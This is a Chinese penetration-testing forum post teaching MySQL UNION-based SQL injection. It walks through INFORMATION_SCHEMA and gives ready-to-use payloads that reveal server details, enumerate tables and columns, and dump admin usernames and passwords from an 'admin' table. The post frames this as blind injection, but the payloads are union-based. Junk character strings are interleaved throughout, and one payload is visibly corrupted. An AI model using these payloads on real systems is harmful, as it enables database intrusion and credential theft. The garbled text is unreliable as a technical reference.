中国网络渗透测试联盟
标题:
mysql常规注入
[打印本页]
作者:
admin
时间:
2012-9-13 17:48
标题:
mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
2 u1 U- Q0 z7 c3 |+ i0 E- X
8 Q4 f* g6 ~/ ?: v2 P. ]
学习盲注前先了解下 IFORMATION_SCHEMA 库
- J" X* s9 {3 H: n
" `+ T; v" ]6 ]9 }$ O
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
* b6 a$ L P X/ M! Z
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
4 t9 I) e& t: B6 o( r( r. E& W
1.得到所有数据库名:
+ G9 a( p0 N4 K+ l! S: W7 u
|SCHEMATA ->存储数据库名的表
U" V0 D1 b! S
|---字段:SCHEMA_NAME ->数据库名称
" L, Q! P& s7 ~4 R h
, m; y6 @/ Y t l
|TABLES ->存储表名
4 ^9 b) l. t- @5 X
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
4 {& C" {- C+ x0 z! N: Z8 X
|---字段:TABLE_NAME ->存储表的表名
# l: T% i/ v& d
6 n$ M- L. V+ H7 P
|COLUMNS ->存储的字段名表
( v' t& h5 u6 _5 {
|---字段:TABLE_SCHEMA ->该字段所属数据库名
/ u4 r; b ^7 p9 k( y# G
|---字段:TABLE_NAME ->存储所属表的名称
, O" w" D- K' a1 e6 c3 r
% X$ i, _& \8 R% n6 A
|---字段:COLUMN_NAME ->该字段的名称
$ x! X+ t6 Q) t7 O
- n- t! G6 j1 P# {8 ]
% c+ Q E1 P( p% V. S
9 E- F( {# s( p
###########################################################################
' c9 u. M" g4 M& |1 a+ Z
! `' j, z1 B6 u
0x001 获取系统信息:
8 z: p* Z" O5 Y0 q" g. p. D
! M+ S n) Q7 Z- x; J/ `
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
) e* s1 `' g. | C8 U
- d; {0 _/ D Z$ g( j" L2 v, x
/*
, f4 x8 D9 u" l x. v
f3 p0 i |, g! r# `% f0 K# `
@@global.version_compile_os 获取系统版本
- b x8 E0 Q8 A2 {& W
+ h( S$ \/ r" | c( k! |4 ~) X
@@datadir 数据库路径
+ {1 L+ K0 V! l$ o9 f- L1 X
database() 当前数据库名称
( \% @8 T/ _! I" i2 _9 ?2 l$ R( q
0x3c62723e 换行HEX值
# u3 g, r" g# @* M: U! f. Y4 R3 }
! s3 B4 d$ i: Y/ _7 f
*/
" G$ O( d g( z4 Q5 Q6 S
) k6 B4 H; a4 I% p3 t
{6 ~ c' s# c# O2 A
9 T0 ]: @* I& U7 g$ r3 o' r
######################################################################
, v; _- [. ^+ s9 M2 g9 H) a- j
' u: J# G' e- v, \# {( T
0x002 获取表名
, f+ c% L) }3 v
- F+ M$ C( a. q& D9 S/ { [
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
2 M! |7 L, S. s- I5 v
3 v' e# k, Q# y0 X* U5 i
A+ M5 f* p' Z9 E' j3 V
- e, l' k+ Q0 c, W( U8 b
/*
5 D U9 K. _& }3 s: s
6 L+ {3 z( j1 X2 e6 h# V
0x67617264656e 为当前数据库名
! z0 Q/ a$ K/ \" ~0 a% X" L
: W: n& X' |" v5 o6 t. w: ]
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
8 g3 q9 C" M3 E
0 @/ ~9 m8 k% w- @/ x" f: g
*/
8 d% r: v* U" Q" i" j, W( |
. o; \* C# P8 Q0 l: i% Y8 F
######################################################################
' U, i3 R [& }, g3 H: `9 G* Q1 q# \
K9 r" B; M8 O8 G0 D
. U# |# B* \# F" ?' V! a( H6 r7 ]9 P
7 \, W& L; D( k& C& \6 D# u
0x003 获取字段
9 M& m. V% Y# k0 ]" u
- q( C, P$ S% x P4 K* x
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
& {6 P% N+ x4 ^3 o9 f" Y2 S
7 q5 v; S# C0 d4 y3 [! h
/*
7 \! \, Y) m% {$ |* o0 D* U1 u8 r
# f8 i6 H2 a: k5 K9 U6 b
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
5 Y: o; g7 m3 J- }' \7 q. y7 |
0 V: W ?$ W. A! n" z
0x61646d696e ->选择一个表
S( B" n7 U: x, m
3 @1 T8 z0 v H {" [
0x67617264656e ->数据库名
( [% e: t, I# J1 Q! C2 _ s
$ u/ |" p* I& M/ Z" T
*/
& P$ M( D& g" B/ O
' z' Q6 r; q3 C
#####################################################################
, I& @6 B* S( q- l
$ b6 h+ m q4 o8 R3 u2 h# Z" m4 B
4 ?; G- _( O8 b
]% B1 d7 ?) y& ^) h3 q; |( X
0x004 获取数据
! P* _2 }1 N' x, G& b
- ]7 C* S7 e) Y' I' i
union select 1,2,3
& t, A1 Z* k$ R% ^5 ^- m: N! }
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
; D( t9 z' ]) g! i6 m
# g b% A- m! q, o3 n: t; e% D
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
% l$ |& d' ~; R7 M g
2 K$ b- a3 o9 C
! d+ o/ M& U- R* k% I
0 x+ \: q) x; ^- C% b2 _
/*
& Y+ d; R. D" f. C0 f. A. q S0 `2 ^
6 }8 H' q! M" d3 E. f; E
0x3c62723e 换行符号HEX编码
( s, i5 i, T7 ^ Q$ o+ ]
" X6 ^7 d0 @4 \2 C* ~+ l4 n; U
group_concat 同时获得该字段所有数据
" M3 ]% L v2 l% k5 `% _
. k, s7 i$ O) p/ C% m
*/
% M+ W% U' V6 o4 [# e1 s- |
4 z# @) v3 B% z4 l# ~5 g
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2